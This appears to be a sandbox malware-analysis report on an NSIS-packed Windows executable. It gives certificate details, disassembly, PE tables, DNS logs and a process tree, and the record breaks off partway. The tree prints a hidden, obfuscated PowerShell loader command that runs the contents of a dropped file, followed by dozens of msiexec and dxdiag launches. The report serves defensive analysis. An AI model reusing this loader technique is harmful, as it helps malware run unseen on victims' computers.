                              Not Before, Not After
                              • Not Before: 26/08/2024 12:35:47, Not After: 26/08/2027 12:35:47
                              Subject Chain
                              • CN=Modificeret, O=Modificeret, L=Fellows, C=US
                              Version:3
                              Thumbprint MD5:B14FCBD05D239BB66E64884964E7C3BB
                              Thumbprint SHA-1:CF0B5FDD8DBAEE379812EAE53CCC6D3A57C78060
                              Thumbprint SHA-256:AAE8FC31F6530FEEFC9141F189C9489005ED507B5FC1F78971F832E72726DFB2
                              Serial:0CA0626EFC9237A43F5473D856147A6DD0A9F87E
                              Instruction
                              push ebp
                              mov ebp, esp
                              sub esp, 00000224h
                              push esi
                              push edi
                              xor edi, edi
                              push 00008001h
                              mov dword ptr [ebp-14h], edi
                              mov dword ptr [ebp-0Ch], 0040A188h
                              mov dword ptr [ebp-08h], edi
                              mov byte ptr [ebp-04h], 00000020h
                              call dword ptr [0040809Ch]
                              mov esi, dword ptr [004080A0h]
                              lea eax, dword ptr [ebp-000000C4h]
                              push eax
                              mov dword ptr [ebp-000000B0h], edi
                              mov dword ptr [ebp-30h], edi
                              mov dword ptr [ebp-2Ch], edi
                              mov dword ptr [ebp-000000C4h], 0000009Ch
                              call esi
                              test eax, eax
                              jne 00007FD3588FF421h
                              lea eax, dword ptr [ebp-000000C4h]
                              mov dword ptr [ebp-000000C4h], 00000094h
                              push eax
                              call esi
                              cmp dword ptr [ebp-000000B4h], 02h
                              jne 00007FD3588FF40Ch
                              movsx cx, byte ptr [ebp-000000A3h]
                              mov al, byte ptr [ebp-000000B0h]
                              sub ecx, 30h
                              sub al, 53h
                              mov byte ptr [ebp-2Ah], 00000004h
                              neg al
                              sbb eax, eax
                              not eax
                              and eax, ecx
                              mov word ptr [ebp-30h], ax
                              cmp dword ptr [ebp-000000B4h], 02h
                              jnc 00007FD3588FF404h
                              and byte ptr [ebp-2Ah], 00000000h
                              cmp byte ptr [ebp-000000AFh], 00000041h
                              jl 00007FD3588FF3F3h
                              movsx ax, byte ptr [ebp-000000AFh]
                              sub eax, 40h
                              mov word ptr [ebp-30h], ax
                              jmp 00007FD3588FF3E6h
                              mov word ptr [ebp-30h], di
                              cmp dword ptr [ebp-000000C0h], 0Ah
                              jnc 00007FD3588FF3EAh
                              and word ptr [ebp+00000000h], 0000h
                              Programming Language:
                              • [EXP] VC++ 6.0 SP5 build 8804
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x853c | 0xa0 | .rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x43000 | 0x637b0 | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x149bb0 | 0x908 |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x294 | .rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                              .text | 0x1000 | 0x660c | 0x6800 | 3b90adcd2f1248db844446cb2ef15486 | False | 0.6663912259615384 | data | 6.411908920093797 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata | 0x8000 | 0x1340 | 0x1400 | b3bd9ad1bd1020c5cf4d51a4d7b61e07 | False | 0.4576171875 | data | 5.237673976044139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data | 0xa000 | 0x25138 | 0x600 | c4e774255fea540ed5efa114edfa6420 | False | 0.4635416666666667 | data | 4.1635686587741 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .ndata | 0x30000 | 0x13000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc | 0x43000 | 0x637b0 | 0x63800 | 7ec750b400c18fb2808562fed9408957 | False | 0.28931032113693467 | data | 5.302493764322081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                              RT_ICON | 0x43328 | 0x4180c | Device independent bitmap graphic, 255 x 510 x 32, image size 260100 | English | United States | 0.24935519940365264
                              RT_ICON | 0x84b38 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.3378238495208802
                              RT_ICON | 0x95360 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.38897939878074417
                              RT_ICON | 0x9e808 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.43522673594709493
                              RT_ICON | 0xa2a30 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.46856846473029046
                              RT_ICON | 0xa4fd8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.559016393442623
                              RT_ICON | 0xa5960 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.6312056737588653
                              RT_DIALOG | 0xa5dc8 | 0x120 | data | English | United States | 0.5138888888888888
                              RT_DIALOG | 0xa5ee8 | 0x11c | data | English | United States | 0.6056338028169014
                              RT_DIALOG | 0xa6008 | 0xc4 | data | English | United States | 0.5918367346938775
                              RT_DIALOG | 0xa60d0 | 0x60 | data | English | United States | 0.7291666666666666
                              RT_GROUP_ICON | 0xa6130 | 0x68 | data | English | United States | 0.7788461538461539
                              RT_VERSION | 0xa6198 | 0x2d8 | data | English | United States | 0.47527472527472525
                              RT_MANIFEST | 0xa6470 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                              DLL | Import
                              ADVAPI32.dll | RegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
                              SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
                              ole32.dll | OleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
                              COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
                              USER32.dll | SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
                              GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
                              KERNEL32.dll | CreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA
                              Language of compilation system | Country where language is spoken
                              English | United States
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Jan 11, 2025 08:22:09.011137962 CET | 1.1.1.1 | 192.168.2.8 | 0xecd3 | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
                              Jan 11, 2025 08:22:09.011137962 CET | 1.1.1.1 | 192.168.2.8 | 0xecd3 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.20 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:09.011137962 CET | 1.1.1.1 | 192.168.2.8 | 0xecd3 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.35 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:09.011137962 CET | 1.1.1.1 | 192.168.2.8 | 0xecd3 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.36 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:09.011137962 CET | 1.1.1.1 | 192.168.2.8 | 0xecd3 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.39 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:09.011137962 CET | 1.1.1.1 | 192.168.2.8 | 0xecd3 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.18 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:09.011137962 CET | 1.1.1.1 | 192.168.2.8 | 0xecd3 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.34 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:09.011137962 CET | 1.1.1.1 | 192.168.2.8 | 0xecd3 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.19 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:09.011137962 CET | 1.1.1.1 | 192.168.2.8 | 0xecd3 | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.23 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:22.572841883 CET | 1.1.1.1 | 192.168.2.8 | 0x376a | No error (0) | edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | CNAME (Canonical name) | IN (0x0001) | false
                              Jan 11, 2025 08:22:22.572841883 CET | 1.1.1.1 | 192.168.2.8 | 0x376a | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.23 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:22.572841883 CET | 1.1.1.1 | 192.168.2.8 | 0x376a | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.34 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:22.572841883 CET | 1.1.1.1 | 192.168.2.8 | 0x376a | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.35 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:22.572841883 CET | 1.1.1.1 | 192.168.2.8 | 0x376a | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.18 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:22.572841883 CET | 1.1.1.1 | 192.168.2.8 | 0x376a | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.20 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:22.572841883 CET | 1.1.1.1 | 192.168.2.8 | 0x376a | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.36 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:22.572841883 CET | 1.1.1.1 | 192.168.2.8 | 0x376a | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 217.20.57.19 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:22:22.572841883 CET | 1.1.1.1 | 192.168.2.8 | 0x376a | No error (0) | default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | | 84.201.210.39 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:23:11.656239986 CET | 1.1.1.1 | 192.168.2.8 | 0xc73d | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                              Jan 11, 2025 08:23:11.656239986 CET | 1.1.1.1 | 192.168.2.8 | 0xc73d | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false

                              Target ID:0
                              Start time:02:21:51
                              Start date:11/01/2025
                              Path:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\MPkM9Dd99B.exe"
                              Imagebase:0x400000
                              File size:1'352'888 bytes
                              MD5 hash:2AFC878D1FCFB41B15BEAFB1FAAB9EDB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:02:21:52
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) "
                              Imagebase:0xe50000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:3
                              Start time:02:21:52
                              Start date:11/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6ee680000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:4
                              Start time:02:22:07
                              Start date:11/01/2025
                              Path:C:\Windows\System32\SIHClient.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\sihclient.exe /cv HhVnUyAsTUmprDuizOSkrg.0.2
                              Imagebase:0x7ff72af10000
                              File size:380'720 bytes
                              MD5 hash:8BE47315BF30475EEECE8E39599E9273
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:5
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:11
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:12
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:13
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:14
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:16
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:17
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:28
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
